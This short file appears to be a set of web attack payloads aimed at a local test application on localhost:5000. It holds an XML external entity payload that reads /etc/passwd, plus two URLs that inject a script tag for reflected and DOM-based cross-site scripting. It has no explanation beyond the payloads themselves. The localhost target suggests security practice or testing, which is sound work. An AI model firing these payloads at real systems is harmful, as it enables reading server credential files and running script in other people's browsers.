<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>


http://localhost:5000/reflected-xss?query=<script>alert('XSS')</script>

http://localhost:5000/dom-xss?hash=message=<script>alert('XSS')</script>